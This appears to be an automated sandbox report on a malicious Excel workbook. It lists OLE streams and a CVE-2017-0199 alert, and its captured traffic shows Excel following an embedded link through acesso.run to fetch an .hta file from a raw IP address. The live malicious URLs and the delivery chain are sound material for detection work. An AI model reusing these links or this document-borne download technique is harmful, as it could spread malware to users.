                          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00F25730/Package
                          CLSID:
                          File Type:Microsoft Excel 2007+
                          Stream Size:872414
                          Entropy:7.996790689733034
                          Base64 Encoded:True
                          Data ASCII:P K . . . . . . . . . . ! . h K x . . . Z . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 68 4b a5 78 f0 01 00 00 5a 09 00 00 13 00 d7 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d3 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00F25731/\x1Ole
                          CLSID:
                          File Type:data
                          Stream Size:688
                          Entropy:4.670091760637894
                          Base64 Encoded:False
                          Data ASCII:. . . . ? > ~ . < I . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . a . c . e . s . s . o . . . r . u . n . / . w . M . y . Y . A . g . ? . & . m . o . r . s . e . l . = . b . e . w . i . l . d . e . r . e . d . & . b . i . f . o . c . a . l . s . = . o . a . f . i . s . h . & . e . g . g . . . . r h F . . . N j . . Y : . 3 u . A / ` B * . 1 . . 1 5 . . . : g j ( . C * \\ ] . . . . . . . . . . . . . . . . . . . 5 . j . M . M . Z . f . Y . 4 . J . h . A . 9 . 2 . 7 . e . K .
                          Data Raw:01 00 00 02 3f 3e 82 7e 15 3c 49 1c 00 00 00 00 00 00 00 00 00 00 00 00 c4 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c0 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 61 00 63 00 65 00 73 00 73 00 6f 00 2e 00 72 00 75 00 6e 00 2f 00 77 00 4d 00 79 00 59 00 41 00 67 00 3f 00 26 00 6d 00 6f 00 72 00 73 00 65 00 6c 00 3d 00 62 00 65 00 77 00 69 00 6c 00 64 00
                          General
                          Stream Path:Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:331656
                          Entropy:7.998658969723312
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . i ` d C . . . 7 ' . f + ~ R b . F c B . T . . I . . . . . . . . . . . . . . \\ . p . [ ? . . t . ( k | M R . # ; 6 . k 2 2 . k T b 6 q ; d . ] * x w P * J B E ] . ^ . . $ n . . N B O . . ~ . Q . . B . . . + a . . . / . . . = . . . ~ . . . . + . . ~ ; N . . x m . . . . . . . . E . . . . . J . . . . . . . . . . . . . | = . . . d S t . R l ^ 5 ^ @ . . . . . . . 6 " . . . N . . . . , . . . . [ . . . f 1 . . . D Y + < Q D t . 6 . . I 9 K H \\ O 1 . . . V L .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 69 a0 60 82 e2 ac 64 43 02 93 b5 8f d9 90 f4 1d 37 a8 27 01 a4 9b 66 9e 2b 7e 52 62 d8 0e c5 46 63 42 f8 d2 94 ab a0 54 dc 11 c2 7f e6 49 a0 84 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 da 9e e2 00 00 00 5c 00 70 00 5b 3f d0 09 17 9b a8 d7 d2 ce 74 d5 02 a7 aa 28 6b f5 7c 4d 81 a7 52 d9 95 23
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                          CLSID:
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:523
                          Entropy:5.246201480176822
                          Base64 Encoded:True
                          Data ASCII:I D = " { E F B E 6 8 3 4 - B 8 D E - 4 6 B E - 9 E 2 A - 3 4 C 8 E 2 E 8 1 D 6 B } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 2 A 0 9 9 E 8 C 8 E C C 8 E C C
                          Data Raw:49 44 3d 22 7b 45 46 42 45 36 38 33 34 2d 42 38 44 45 2d 34 36 42 45 2d 39 45 32 41 2d 33 34 43 38 45 32 45 38 31 44 36 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                          CLSID:
                          File Type:data
                          Stream Size:104
                          Entropy:3.0488640812019017
                          Base64 Encoded:False
                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                          CLSID:
                          File Type:data
                          Stream Size:2644
                          Entropy:3.98613630820396
                          Base64 Encoded:False
                          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                          CLSID:
                          File Type:data
                          Stream Size:553
                          Entropy:6.350090050872894
                          Base64 Encoded:True
                          Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . c J 3 i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                          Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 63 4a 33 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-10-29T20:44:09.631426+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.2249164107.175.130.3680TCP
                          TimestampSource PortDest PortSource IPDest IP
                          Oct 29, 2024 20:44:07.625664949 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:07.625708103 CET44349163172.67.162.95192.168.2.22
                          Oct 29, 2024 20:44:07.625787020 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:07.631963968 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:07.631979942 CET44349163172.67.162.95192.168.2.22
                          Oct 29, 2024 20:44:08.315032959 CET44349163172.67.162.95192.168.2.22
                          Oct 29, 2024 20:44:08.315100908 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:08.321306944 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:08.321321964 CET44349163172.67.162.95192.168.2.22
                          Oct 29, 2024 20:44:08.321732998 CET44349163172.67.162.95192.168.2.22
                          Oct 29, 2024 20:44:08.321798086 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:08.397181034 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:08.439341068 CET44349163172.67.162.95192.168.2.22
                          Oct 29, 2024 20:44:08.938457966 CET44349163172.67.162.95192.168.2.22
                          Oct 29, 2024 20:44:08.938529968 CET44349163172.67.162.95192.168.2.22
                          Oct 29, 2024 20:44:08.938585043 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:08.938869953 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:08.939769030 CET49163443192.168.2.22172.67.162.95
                          Oct 29, 2024 20:44:08.939795971 CET44349163172.67.162.95192.168.2.22
                          Oct 29, 2024 20:44:08.946357012 CET4916480192.168.2.22107.175.130.36
                          Oct 29, 2024 20:44:08.951781988 CET8049164107.175.130.36192.168.2.22
                          Oct 29, 2024 20:44:08.951842070 CET4916480192.168.2.22107.175.130.36
                          Oct 29, 2024 20:44:08.951905966 CET4916480192.168.2.22107.175.130.36
                          Oct 29, 2024 20:44:08.957257986 CET8049164107.175.130.36192.168.2.22
                          Oct 29, 2024 20:44:09.631284952 CET8049164107.175.130.36192.168.2.22
                          Oct 29, 2024 20:44:09.631426096 CET4916480192.168.2.22107.175.130.36
                          Oct 29, 2024 20:44:14.666838884 CET8049164107.175.130.36192.168.2.22
                          Oct 29, 2024 20:44:14.666929007 CET4916480192.168.2.22107.175.130.36
                          TimestampSource PortDest PortSource IPDest IP
                          Oct 29, 2024 20:44:07.607215881 CET5456253192.168.2.228.8.8.8
                          Oct 29, 2024 20:44:07.620135069 CET53545628.8.8.8192.168.2.22
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Oct 29, 2024 20:44:07.607215881 CET192.168.2.228.8.8.80x362dStandard query (0)acesso.runA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Oct 29, 2024 20:44:07.620135069 CET8.8.8.8192.168.2.220x362dNo error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                          Oct 29, 2024 20:44:07.620135069 CET8.8.8.8192.168.2.220x362dNo error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                          • acesso.run
                          • 107.175.130.36
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.2249164107.175.130.36803380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          Oct 29, 2024 20:44:08.951905966 CET388OUTGET /80/de/seethegoodgirlwhoismylovershealwayslovedmealotwithhereyes.hta HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 107.175.130.36
                          Connection: Keep-Alive
                          Oct 29, 2024 20:44:09.631284952 CET541INHTTP/1.1 404 Not Found
                          Date: Tue, 29 Oct 2024 19:44:09 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                          Content-Length: 300
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: text/html; charset=iso-8859-1
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 35 2e 31 33 30 2e 33 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 107.175.130.36 Port 80</address></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.2249163172.67.162.954433380C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          2024-10-29 19:44:08 UTC362OUTGET /wMyYAg?&morsel=bewildered&bifocals=oafish&egg HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: acesso.run
                          Connection: Keep-Alive
                          2024-10-29 19:44:08 UTC1068INHTTP/1.1 302 Found
                          Date: Tue, 29 Oct 2024 19:44:08 GMT
                          Content-Type: text/plain; charset=utf-8
                          Content-Length: 111
                          Connection: close
                          X-DNS-Prefetch-Control: off
                          X-Frame-Options: SAMEORIGIN
                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                          X-Download-Options: noopen
                          X-Content-Type-Options: nosniff
                          X-XSS-Protection: 0
                          Location: http://107.175.130.36/80/de/seethegoodgirlwhoismylovershealwayslovedmealotwithhereyes.hta
                          Vary: Accept
                          cf-cache-status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yZt7LH8Hfw35P9vCJYo2k9BrMQeCU74XsSTjqXDrMs7ioidW1kRyyFyMcv%2BXTaYqtP7fsdj9ijWFH4nMUKNN9DwVqCXl7U2aGeQginwnpgXb%2FBdnPYqn%2FsSvUAFS"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8da5a894fac1e916-DFW
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=2295&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=944&delivery_rate=1231816&cwnd=251&unsent_bytes=0&cid=5a0c2c1604a2cfb8&ts=611&x=0"
                          2024-10-29 19:44:08 UTC111INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 37 2e 31 37 35 2e 31 33 30 2e 33 36 2f 38 30 2f 64 65 2f 73 65 65 74 68 65 67 6f 6f 64 67 69 72 6c 77 68 6f 69 73 6d 79 6c 6f 76 65 72 73 68 65 61 6c 77 61 79 73 6c 6f 76 65 64 6d 65 61 6c 6f 74 77 69 74 68 68 65 72 65 79 65 73 2e 68 74 61
                          Data Ascii: Found. Redirecting to http://107.175.130.36/80/de/seethegoodgirlwhoismylovershealwayslovedmealotwithhereyes.hta


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:15:43:16
                          Start date:29/10/2024
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                          Imagebase:0x13f1b0000
                          File size:28'253'536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:4
                          Start time:15:44:31
                          Start date:29/10/2024
                          Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                          Imagebase:0x2c0000
                          File size:2'525'680 bytes
                          MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          No disassembly